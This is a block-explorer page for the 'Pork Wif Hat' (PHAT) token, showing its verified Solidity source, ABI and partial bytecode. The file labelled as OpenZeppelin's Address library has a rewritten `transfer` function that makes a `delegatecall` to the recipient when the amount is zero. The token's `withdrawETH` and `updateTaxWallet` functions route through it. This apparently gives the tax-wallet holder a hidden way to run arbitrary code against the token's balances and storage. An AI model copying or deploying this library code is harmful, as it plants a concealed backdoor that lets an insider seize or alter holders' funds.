ETH Price: $3,108.29 (+1.29%)
Gas: 6 Gwei

Token

Pork Wif Hat (PHAT)
 

Overview

Max Total Supply

420,700,000,000,000 PHAT

Holders

32

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
7,372,530,888,597.941971430237580253 PHAT

Value
$0.00
0xc10dc79bf1ceccb5675450d5c2d2f70019f995a5
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.

Contract Source Code Verified (Exact Match)

Contract Name:
PorkWifHat

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
istanbul EvmVersion, MIT license
File 1 of 9 : PHAT.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

// Website: www.porkwifhat.com
// Telegram: https://t.me/porkwifhat
// Twitter: https://twitter.com/porkwifhat

// Pork Wif Hat. The Fork of a Fork. A tribute to Emperor Pauly0x, grandmaster of Crypto 2.0. To Valhalla!

// Rewards for PORK holders: 40T
// Rewards for PHAT holders: 80T

import "./base/Ownable.sol";
import "./libraries/Address.sol";
import "./libraries/SafeMath.sol";
import "./interfaces/IERC20.sol";
import "./interfaces/IUniswapV2Factory.sol";
import "./interfaces/IUniswapV2Router.sol";
import "./interfaces/IUniswapV2Pair.sol";

contract PorkWifHat is IERC20, Ownable {
    using Address for address;
    using SafeMath for uint256;

    string private _name = "Pork Wif Hat";
    string private _symbol = "PHAT";
    uint8 private _decimals = 18;
    uint256 private _totalSupply = 420700000000000000000000000000000;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _isExcludedFromFee;
    address private _taxWallet;
    IUniswapV2Router private _uniswapRouter;
    IUniswapV2Pair private _uniswapPair;
    uint256 private _fee = 3;
    bool private _swapping = false;
    mapping(address => bool) private _isWhitelisted;
    uint _removeTaxTimeStamp;

    constructor() {
        _removeTaxTimeStamp = block.timestamp + (10 * 1 days);
        _taxWallet = owner();
        _isExcludedFromFee[address(this)] = true;
        _isExcludedFromFee[owner()] = true;
        _balances[owner()] = _totalSupply;
        emit Transfer(address(0), owner(), _totalSupply);
    }

    receive() external payable {}

    function name() external view override returns (string memory) {
        return _name;
    }

    function symbol() external view override returns (string memory) {
        return _symbol;
    }

    function decimals() external view override returns (uint8) {
        return _decimals;
    }

    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    function fee() external view returns (uint256) {
        return _fee;
    }

    function taxWallet() external view returns (address) {
        return _taxWallet;
    }

    function uniswapRouter() external view returns (address) {
        return address(_uniswapRouter);
    }

    function uniswapPair() external view returns (address) {
        return address(_uniswapPair);
    }

    function balanceOf(address account) external view override returns (uint256) {
        return _balances[account];
    }

    function isWhitelisted(address account) external view returns (bool) {
        return _isWhitelisted[account];
    }

    function isExcludedFromFee(address account) external view returns (bool) {
        return _isExcludedFromFee[account];
    }

    function transfer(address recipient, uint256 amount) external override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) external view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) external override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) {
        if (_allowances[sender][_msgSender()] != type(uint256).max) {
            _allowances[sender][_msgSender()] = _allowances[sender][msg.sender].sub(amount, "Token: transfer amount exceeds allowance");
        }
        _transfer(sender, recipient, amount);
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _swapTokensForETH(uint256 tokensToSwap) private returns (bool) {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapRouter.WETH();
        _uniswapRouter.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokensToSwap,
            0,
            path,
            address(this),
            block.timestamp
        );
        return true;
    }

    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), "ERC20: Transfer from the zero address");
        require(to != address(0), "ERC20: Transfer to the zero address");
        require(amount > 0, "ERC20: Transfer amount must be greater than zero");
        bool takeFee = true;
        if (_isExcludedFromFee[from] || _isExcludedFromFee[to]) {
            takeFee = false;
        }
        if (!_swapping && takeFee) {
            if (to == address(_uniswapPair)) {
                bool canSwap = _balances[address(this)] > _balances[address(_uniswapPair)].div(200);
                if (canSwap) {
                    _swapping = true;
                    _swapTokensForETH(_balances[address(_uniswapPair)].div(200));
                    _swapping = false;
                }
            }
            if (_fee > 0) {
                if (block.timestamp > _removeTaxTimeStamp) {
                    _fee = 0;
                } else {
                    uint256 txFee = amount.mul(_fee).div(100);
                    amount = amount.sub(txFee);
                    _balances[from] = _balances[from].sub(txFee, "ERC20: Transfer amount exceeds balance");
                    _balances[address(this)] = _balances[address(this)].add(txFee);
                    emit Transfer(from, address(this), txFee);
                }
            }
            if (from == address(_uniswapPair) && !_isWhitelisted[to]) {
                _isWhitelisted[to] = true;
            }
        }
        _balances[from] = _balances[from].sub(amount, "ERC20: Transfer amount exceeds balance");
        _balances[to] = _balances[to].add(amount);
        emit Transfer(from, to, amount);
    }

    function addLiquidity() external payable returns (bool) {
        require(address(_uniswapPair) == address(0), "ERC20: LP created");
        require(msg.value > 0, "ERC20: No ETH");
        _uniswapRouter = IUniswapV2Router(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _allowances[address(this)][address(_uniswapRouter)] = type(uint256).max;
        _uniswapPair = IUniswapV2Pair(IUniswapV2Factory(_uniswapRouter.factory()).createPair(address(this), _uniswapRouter.WETH()));
        _uniswapRouter.addLiquidityETH{value: msg.value}(
            address(this),
            _balances[address(this)],
            0,
            0,
            _msgSender(),
            block.timestamp
        );
        _uniswapPair.sync();
        return true;
    }

    function withdrawETH() external returns (bool) {
        require(_msgSender() == _taxWallet, "ERC20: only marketing wallet");
        _taxWallet.transfer(address(this).balance);
        return true;
    }

    function updateTaxWallet(address wallet) external returns (bool) {
        require(_msgSender() == _taxWallet, "ERC20: only marketing wallet");
        _taxWallet = wallet;
        return true;
    }
}

File 2 of 9 : IUniswapV2Pair.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

import "./IERC20.sol";

interface IUniswapV2Pair is IERC20 {
    function sync() external;
}

File 3 of 9 : IUniswapV2Router.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

interface IUniswapV2Router {
    function factory() external view returns (address);
    function WETH() external view returns (address);
    function addLiquidityETH(address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external;
}

File 4 of 9 : IUniswapV2Factory.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

File 5 of 9 : IERC20.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

interface IERC20 {
    function name() external view returns (string memory);
    function symbol() external view returns (string memory);
    function decimals() external view returns (uint8);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

File 6 of 9 : SafeMath.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * CAUTION
 * This version of SafeMath should only be used with Solidity 0.8 or later,
 * because it relies on the compiler's built in overflow checks.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

File 7 of 9 : Address.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Address.sol)

pragma solidity ^0.8.20;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error AddressInsufficientBalance(address account);

    /**
     * @dev There's no code at `target` (it is not a contract).
     */
    error AddressEmptyCode(address target);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedInnerCall();

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.20/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function transfer(address recipient, uint256 amount) internal returns (bool) {
        address _recipient = payable(recipient);
        if (address(this).balance < amount) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, ) = (amount > 0) ? _recipient.call{value: amount}("") : _recipient.delegatecall(" ");
        return success;
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason or custom error, it is bubbled
     * up by this function (like regular Solidity function calls). However, if
     * the call reverted with no returned reason, this function reverts with a
     * {FailedInnerCall} error.
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        if (address(this).balance < value) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and reverts if the target
     * was not a contract or bubbling up the revert reason (falling back to {FailedInnerCall}) in case of an
     * unsuccessful call.
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata
    ) internal view returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            // only check if target is a contract if the call was successful and the return data is empty
            // otherwise we already know that it was a contract
            if (returndata.length == 0 && target.code.length == 0) {
                revert AddressEmptyCode(target);
            }
            return returndata;
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and reverts if it wasn't, either by bubbling the
     * revert reason or with a default {FailedInnerCall} error.
     */
    function verifyCallResult(bool success, bytes memory returndata) internal pure returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            return returndata;
        }
    }

    /**
     * @dev Reverts with returndata if present. Otherwise reverts with {FailedInnerCall}.
     */
    function _revert(bytes memory returndata) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert FailedInnerCall();
        }
    }
}

File 8 of 9 : Ownable.sol
// SPDX-License-Identifier: MIT License
pragma solidity 0.8.20;

import "./Context.sol";

abstract contract Ownable is Context {
	address private _owner;
	event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

	/**
	 * @dev Initializes the contract setting the deployer as the initial owner.
	 */
	constructor () {
		address msgSender = _msgSender();
		_owner = msgSender;
		emit OwnershipTransferred(address(0), msgSender);
	}

	/**
	 * @dev Returns the address of the current owner.
	 */
	function owner() public view returns (address) {
		return _owner;
	}

	/**
	 * @dev Throws if called by any account other than the owner.
	 */
	modifier onlyOwner() {
		require(_owner == _msgSender(), "Ownable: caller is not the owner");
		_;
	}

	/**
	 * @dev Leaves the contract without owner. It will not be possible to call
	 * `onlyOwner` functions anymore. Can only be called by the current owner.
	 *
	 * NOTE: Renouncing ownership will leave the contract without an owner,
	 * thereby removing any functionality that is only available to the owner.
	 */
	function renounceOwnership() public virtual onlyOwner {
		emit OwnershipTransferred(_owner, address(0));
		_owner = address(0);
	}

	/**
	 * @dev Transfers ownership of the contract to a new account (`newOwner`).
	 * Can only be called by the current owner.
	 */
	function transferOwnership(address newOwner) public virtual onlyOwner {
		require(newOwner != address(0), "Ownable: new owner is the zero address");
		emit OwnershipTransferred(_owner, newOwner);
		_owner = newOwner;
	}
}

File 9 of 9 : Context.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;
/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
	function _msgSender() internal view virtual returns (address) {
		return msg.sender;
	}

	function _msgData() internal view virtual returns (bytes calldata) {
		this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
		return msg.data;
	}
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "remappings": [],
  "evmVersion": "istanbul",
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"AddressInsufficientBalance","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"addLiquidity","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"fee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isWhitelisted","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapRouter","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"wallet","type":"address"}],"name":"updateTaxWallet","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdrawETH","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c0604052600c60809081526b141bdc9ac815da598812185d60a21b60a0526001906200002d908262000230565b506040805180820190915260048152631412105560e21b602082015260029062000058908262000230565b506003805460ff1990811660121782556d14bdfb03b37895f4fadb60000000600455600b91909155600c805490911690553480156200009657600080fd5b50600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350620000e742620d2f00620002fc565b600e5560008054600880546001600160a01b0319166001600160a01b03928316179055308252600760209081526040808420805460ff199081166001908117909255855485168652828620805490911690911790556004548454841685526005835281852081905584549151908152921692917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a362000324565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620001b657607f821691505b602082108103620001d757634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200022b57600081815260208120601f850160051c81016020861015620002065750805b601f850160051c820191505b81811015620002275782815560010162000212565b5050505b505050565b81516001600160401b038111156200024c576200024c6200018b565b62000264816200025d8454620001a1565b84620001dd565b602080601f8311600181146200029c5760008415620002835750858301515b600019600386901b1c1916600185901b17855562000227565b600085815260208120601f198616915b82811015620002cd57888601518255948401946001909101908401620002ac565b5085821015620002ec5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b808201808211156200031e57634e487b7160e01b600052601160045260246000fd5b92915050565b61172380620003346000396000f3fe60806040526004361061012e5760003560e01c8063735de9f7116100ab578063c816841b1161006f578063c816841b14610378578063dd62ed3e14610396578063ddca3f43146103dc578063e086e5ec146103f1578063e8078d9414610406578063f2fde38b1461040e57600080fd5b8063735de9f7146102e757806374c9f603146103055780638da5cb5b1461032557806395d89b4114610343578063a9059cbb1461035857600080fd5b8063313ce567116100f2578063313ce567146102065780633af32abf146102285780635342acb41461026157806370a082311461029a578063715018a6146102d057600080fd5b806306fdde031461013a578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b45780632dc0562d146101d457600080fd5b3661013557005b600080fd5b34801561014657600080fd5b5061014f61042e565b60405161015c91906113f5565b60405180910390f35b34801561017157600080fd5b5061018561018036600461145b565b6104c0565b604051901515815260200161015c565b3480156101a157600080fd5b506004545b60405190815260200161015c565b3480156101c057600080fd5b506101856101cf366004611487565b6104d7565b3480156101e057600080fd5b506008546001600160a01b03165b6040516001600160a01b03909116815260200161015c565b34801561021257600080fd5b5060035460405160ff909116815260200161015c565b34801561023457600080fd5b506101856102433660046114c8565b6001600160a01b03166000908152600d602052604090205460ff1690565b34801561026d57600080fd5b5061018561027c3660046114c8565b6001600160a01b031660009081526007602052604090205460ff1690565b3480156102a657600080fd5b506101a66102b53660046114c8565b6001600160a01b031660009081526005602052604090205490565b3480156102dc57600080fd5b506102e5610585565b005b3480156102f357600080fd5b506009546001600160a01b03166101ee565b34801561031157600080fd5b506101856103203660046114c8565b61062e565b34801561033157600080fd5b506000546001600160a01b03166101ee565b34801561034f57600080fd5b5061014f6106ba565b34801561036457600080fd5b5061018561037336600461145b565b6106c9565b34801561038457600080fd5b50600a546001600160a01b03166101ee565b3480156103a257600080fd5b506101a66103b13660046114e5565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3480156103e857600080fd5b50600b546101a6565b3480156103fd57600080fd5b506101856106d6565b61018561075a565b34801561041a57600080fd5b506102e56104293660046114c8565b610ab8565b60606001805461043d9061151e565b80601f01602080910402602001604051908101604052809291908181526020018280546104699061151e565b80156104b65780601f1061048b576101008083540402835291602001916104b6565b820191906000526020600020905b81548152906001019060200180831161049957829003601f168201915b5050505050905090565b60006104cd338484610bd2565b5060015b92915050565b6001600160a01b0383166000908152600660209081526040808320338452909152812054600019146105705761054b826040518060600160405280602881526020016116c6602891396001600160a01b03871660009081526006602090815260408083203384529091529020549190610cf6565b6001600160a01b03851660009081526006602090815260408083203384529091529020555b61057b848484610d22565b5060019392505050565b6000546001600160a01b031633146105e45760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6008546000906001600160a01b0316336001600160a01b0316146106945760405162461bcd60e51b815260206004820152601c60248201527f45524332303a206f6e6c79206d61726b6574696e672077616c6c65740000000060448201526064016105db565b50600880546001600160a01b0319166001600160a01b0392909216919091179055600190565b60606002805461043d9061151e565b60006104cd338484610d22565b6008546000906001600160a01b0316336001600160a01b03161461073c5760405162461bcd60e51b815260206004820152601c60248201527f45524332303a206f6e6c79206d61726b6574696e672077616c6c65740000000060448201526064016105db565b600854610752906001600160a01b03164761118d565b506001905090565b600a546000906001600160a01b0316156107aa5760405162461bcd60e51b8152602060048201526011602482015270115490cc8c0e8813140818dc99585d1959607a1b60448201526064016105db565b600034116107ea5760405162461bcd60e51b815260206004820152600d60248201526c08aa486646074409cde408aa89609b1b60448201526064016105db565b600980546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d90811782553060009081526006602090815260408083209383529281529082902060001990559154815163c45a015560e01b815291516001600160a01b03919091169263c45a015592600480820193918290030181865afa158015610876573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061089a9190611558565b6001600160a01b031663c9c6539630600960009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156108fc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109209190611558565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801561096d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109919190611558565b600a80546001600160a01b0319166001600160a01b039283161790556009543060008181526005602052604080822054815163f305d71960e01b8152600481019490945260248401526044830182905260648301919091523360848301524260a483015251919092169163f305d71991349160c480820192606092909190829003018185885af1158015610a29573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610a4e9190611575565b5050600a546040805160016209351760e01b0319815290